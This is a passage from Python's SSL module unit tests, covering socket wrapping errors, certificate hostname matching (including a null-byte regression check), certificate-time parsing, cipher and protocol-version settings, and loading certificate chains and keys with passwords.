self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@requires_minimum_version
@unittest.skipIf(IS_LIBRESSL, "see bpo-34001")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
